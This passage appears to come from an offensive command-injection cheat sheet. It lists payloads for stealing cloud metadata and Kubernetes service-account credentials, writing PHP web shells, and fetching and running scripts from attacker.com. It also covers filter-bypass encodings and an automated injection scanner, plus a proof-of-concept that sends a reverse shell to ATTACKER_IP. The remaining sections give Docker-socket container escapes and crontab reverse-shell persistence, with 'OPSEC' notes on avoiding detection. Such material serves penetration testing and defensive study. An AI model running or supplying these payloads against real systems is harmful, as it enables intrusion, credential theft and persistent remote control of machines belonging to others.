| curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" https://kubernetes.default.svc/api/v1/namespaces
# Cloud metadata access (AWS/GCP/Azure)
# AWS EC2 metadata
; curl http://169.254.169.254/latest/meta-data/
| curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
& curl http://169.254.169.254/latest/user-data/
# AWS IMDSv2 (requires token)
; TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600") && curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
# GCP metadata
; curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/
| curl -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
# Azure metadata
; curl -H "Metadata: true" http://169.254.169.254/metadata/instance?api-version=2021-02-01
| curl -H "Metadata: true" http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/
# File upload via command injection
# Create web shell
; echo '<?php system($_GET["cmd"]); ?>' > /var/www/html/shell.php
| echo 'PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+' | base64 -d > /var/www/html/shell.php
& printf '<?php eval($_POST[x]); ?>' > /var/www/html/backdoor.php
# Download and execute remote payload
; curl http://attacker.com/shell.sh | bash
| wget -O- http://attacker.com/payload.py | python3
& powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
# OPSEC: Use legitimate tools for download
; curl -o /tmp/update.sh https://attacker.com/legit-looking-script.sh && chmod +x /tmp/update.sh && /tmp/update.sh
| wget -q https://attacker.com/app-update -O /tmp/update && /tmp/update
# Environment variable manipulation
# Add malicious PATH entry
; export PATH=/tmp:$PATH && echo '#!/bin/bash\nwhoami' > /tmp/ls && chmod +x /tmp/ls
# Unset PATH (force absolute paths - bypass validation)
; unset PATH; /bin/id
| env -i /usr/bin/whoami
# LD_PRELOAD hijacking (if writable directory available)
; echo 'void _init() { system("/bin/bash"); }' > /tmp/evil.c && gcc -shared -fPIC -o /tmp/evil.so /tmp/evil.c && LD_PRELOAD=/tmp/evil.so /bin/true
# Process information gathering
# Comprehensive enumeration
; ps aux | grep -v grep
| netstat -tulpn
|| cat /proc/cpuinfo && cat /proc/meminfo ||
& cat /proc/version && uname -a
# Check running services
; systemctl list-units --type=service --state=running
| service --status-all
& netstat -ano | findstr LISTENING # Windows
# Find SUID binaries (privilege escalation)
; find / -perm -4000 -type f 2>/dev/null
| find / -perm -u=s -type f 2>/dev/null
# Search for credentials
; grep -r "password" /var/www/ 2>/dev/null
| find / -name "*.env" -o -name "*credentials*" 2>/dev/null
& cat /home/*/.bash_history | grep -i "pass\|user\|ssh"
Filter Bypass Techniques#
# Space bypasses (evade space filters)
${IFS} # Internal Field Separator
$IFS$9 # IFS with positional parameter
{cat,/etc/passwd} # Brace expansion
cat$IFS/etc/passwd
cat${IFS}/etc/passwd
cat$IFS$9/etc/passwd
<cat</etc/passwd # Redirection-based spacing
X=$'cat\x20/etc/passwd';$X # Hex encoding in variable
# Examples:
cat${IFS}/etc/passwd
cat$IFS$9/etc/passwd
{cat,/etc/passwd}
cat</etc/passwd</dev/null
X=$'cat\x20/etc/passwd';$X
# Quote bypasses (evade quote-based filters)
c'a't /etc/passwd # Single quotes
c"a"t /etc/passwd # Double quotes
c\a\t /etc/passwd # Backslash escaping
ca$@t /etc/passwd # Special parameter (empty in most contexts)
ca$1t /etc/passwd # Positional parameter (if $1 is empty)
# Keyword filtering bypasses
# If 'cat' is filtered
tac /etc/passwd # Reverse cat
less /etc/passwd
more /etc/passwd
head /etc/passwd
tail /etc/passwd
nl /etc/passwd # Number lines
od -c /etc/passwd # Octal dump
xxd /etc/passwd # Hex dump
strings /etc/passwd
grep . /etc/passwd # Print all lines
awk '{print}' /etc/passwd
sed -n 'p' /etc/passwd
while read line; do echo $line; done < /etc/passwd
# If 'etc' is filtered
cat /e*c/passwd
cat /et?/passwd
cat /etc/pass??
cat /*/*/passwd
cat $(echo /etc/passwd)
cat /e\tc/passwd
# Wildcard obfuscation
/b?n/?s /etc/passwd # /bin/ls
/u*/b*/p*thon* # /usr/bin/python
# Hex/octal encoding (bypass keyword filters)
# Hex encoding in bash
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" | xargs cat # /etc/passwd
$(printf "\143\141\164") /etc/passwd # 'cat' in octal
$(printf "\x63\x61\x74") /etc/passwd # 'cat' in hex
# Variable manipulation
a=c;b=at;$a$b /etc/passwd
cmd=cat;$cmd /etc/passwd
c=c;a=a;t=t;$c$a$t /etc/passwd
# Reverse command construction
rev<<<'dwssap/cte/ tac' | bash # Reverses to: cat /etc/passwd
# Base64 encoding (obfuscate entire command)
echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | bash # 'cat /etc/passwd'
echo "$(echo Y2F0IC9ldGMvcGFzc3dk | base64 -d)"
# Command substitution bypasses
;$(echo cat) /etc/passwd
;`echo cat` /etc/passwd
;$(expr cat) # If expr available
;$(printf cat)
# Encoding entire payload
; echo "cat /etc/passwd" | sh
| echo Y2F0IC9ldGMvcGFzc3dk | base64 -d | sh
& echo 'Y2F0IC9ldGMvcGFzc3dk' | base64 -d | bash
# OPSEC: Case manipulation (Windows)
WhOaMi # Windows is case-insensitive
DI%R # DIR
NeTsTaT -an
# Unicode/special characters (context-dependent)
cat /etc/passwd # Contains zero-width non-joiner U+200C
cat /etc/passwd # Contains zero-width space U+200B
# Glob patterns (bypass exact string matches)
/???/c?t /???/p??s?? # /bin/cat /etc/passwd
[/]???[/]c?t [/]e??[/]??ss?[?] # Same with character classes
# Time-based command obfuscation
sleep$(expr 1 + 4) # sleep 5
sleep $((1+4)) # Arithmetic expansion
# Alternative shells (if bash is restricted)
; sh -c "cat /etc/passwd"
| dash -c "whoami"
& zsh -c "id"
|| ash -c "hostname" ||
# OPSEC: Combine multiple bypasses
; ${IFS}c${IFS}a${IFS}t${IFS}/e*c/p*s*w*d
| {ca$@t,/et?/pass??}
& echo$IFS$(echo Y2F0IC9ldGMvcGFzc3dk|base64${IFS}-d)|sh
Testing Methodology#
# Automated command injection testing (with rate limiting)
#!/bin/bash
# Usage: ./cmdi_test.sh "http://target.com/ping" "ip" "127.0.0.1"
url="$1"
param="$2"
default_value="$3"
output="cmdi_results_$(date +%Y%m%d_%H%M%S).txt"
delay=2 # OPSEC: Delay between requests
echo "[*] Testing command injection on: $url" | tee "$output"
echo "[*] Parameter: $param" | tee -a "$output"
# Phase 1: Time-based detection (least noisy)
echo "[*] Phase 1: Time-based detection" | tee -a "$output"
time_payloads=(
"; sleep 5"
"| sleep 5"
"& sleep 5 &"
"\$(sleep 5)"
"\`sleep 5\`"
"|| sleep 5 ||"
"; sleep 5 || ping -n 5 127.0.0.1" # Cross-platform
)
for payload in "${time_payloads[@]}"; do
test_value="${default_value}${payload}"
echo "[*] Testing: $payload" | tee -a "$output"
start_time=$(date +%s)
curl -s -X POST "$url" \
-d "${param}=${test_value}" \
-A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \
--max-time 10 >/dev/null 2>&1
end_time=$(date +%s)
duration=$((end_time - start_time))
if [ $duration -ge 5 ]; then
echo "[+] VULNERABLE: Time delay detected (${duration}s)" | tee -a "$output"
echo "[+] Payload: $payload" | tee -a "$output"
# Skip further testing if vulnerability confirmed
echo "[*] Vulnerability confirmed. Generating PoC..." | tee -a "$output"
echo "[PoC] ${url}?${param}=${test_value}" | tee -a "$output"
exit 0
fi
sleep $delay # OPSEC: Rate limiting
done
# Phase 2: DNS-based detection (if time-based fails)
echo "[*] Phase 2: DNS-based detection" | tee -a "$output"
unique_id=$(date +%s)
dns_domain="cmdi-${unique_id}.attacker.com"
dns_payloads=(
"; nslookup ${dns_domain}"
"| dig ${dns_domain}"
"& nslookup ${dns_domain}"
"\$(nslookup ${dns_domain})"
"\`host ${dns_domain}\`"
)
for payload in "${dns_payloads[@]}"; do
test_value="${default_value}${payload}"
echo "[*] Testing: $payload" | tee -a "$output"
echo "[*] Check DNS logs for: ${dns_domain}" | tee -a "$output"
curl -s -X POST "$url" \
-d "${param}=${test_value}" \
-A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" \
--max-time 5 >/dev/null 2>&1
sleep $delay
done
echo "[*] Testing complete. Check DNS logs for confirmation." | tee -a "$output"
echo "[*] Results saved to: $output"
# Modern tool alternatives (2025)
# Commix - Automated command injection tool
commix --url="http://target.com/ping" --data="ip=127.0.0.1" --level=3 --batch
# With custom User-Agent and proxy
commix --url="http://target.com/ping" \
--data="ip=INJECT_HERE" \
--user-agent="Mozilla/5.0" \
--proxy="http://127.0.0.1:8080" \
--batch
# OPSEC: Time-based only (stealth mode)
commix --url="http://target.com/ping?ip=INJECT_HERE" \
--technique=T \
--delay=2 \
--random-agent \
--batch
# Manual PoC generation after confirmation
cat > cmdi_poc.sh << 'EOF'
#!/bin/bash
# Command Injection PoC
# Target: http://target.com/ping
# Parameter: ip
# Confirmed vulnerable payload
PAYLOAD="; whoami"
echo "[*] Executing command injection..."
response=$(curl -s -X POST "http://target.com/ping" \
-d "ip=127.0.0.1${PAYLOAD}" \
-A "Mozilla/5.0")
echo "[*] Response:"
echo "$response"
# Establish reverse shell
echo "[*] Attempting reverse shell..."
REVERSE_SHELL="; bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"
curl -s -X POST "http://target.com/ping" \
-d "ip=127.0.0.1${REVERSE_SHELL}" &
echo "[*] Reverse shell sent. Check listener on port 4444"
EOF
chmod +x cmdi_poc.sh
# Listener setup for reverse shell
nc -lvnp 4444
# OPSEC: Using encrypted channel
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
openssl s_server -quiet -key server.pem -cert server.pem -port 4444
Container Escape Exploitation#
# Detecting container environment
; cat /proc/1/cgroup | grep -E "docker|lxc|kubepods"
| cat /.dockerenv 2>/dev/null && echo "Docker detected"
& cat /proc/self/mountinfo | grep docker
# Docker socket exploitation (if accessible)
; docker -H unix:///var/run/docker.sock ps
| docker -H unix:///var/run/docker.sock images
# Create privileged container and escape
; docker -H unix:///var/run/docker.sock run -v /:/hostfs --rm -it alpine chroot /hostfs sh
| docker -H unix:///var/run/docker.sock run --privileged --pid=host -it alpine nsenter -t 1 -m -u -i -n sh
# Kubernetes service account exploitation
; SA_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
| curl -k -H "Authorization: Bearer $SA_TOKEN" https://kubernetes.default.svc/api/v1/namespaces/default/pods
# List all pods in cluster
; kubectl --token=$SA_TOKEN --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt get pods --all-namespaces
# Privileged container check (capabilities)
; capsh --print | grep cap_sys_admin
| cat /proc/self/status | grep CapEff
# Mount host filesystem (if privileged)
; mkdir /host && mount /dev/sda1 /host && cat /host/etc/shadow
| fdisk -l && mount /dev/vda1 /mnt && ls /mnt
# OPSEC: Persistence in container
; echo "* * * * * root /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'" >> /etc/crontab
| echo 'bash -i >& /dev/tcp/attacker.com/4444 0>&1' > /tmp/.hidden && chmod +x /tmp/.hidden && /tmp/.hidden &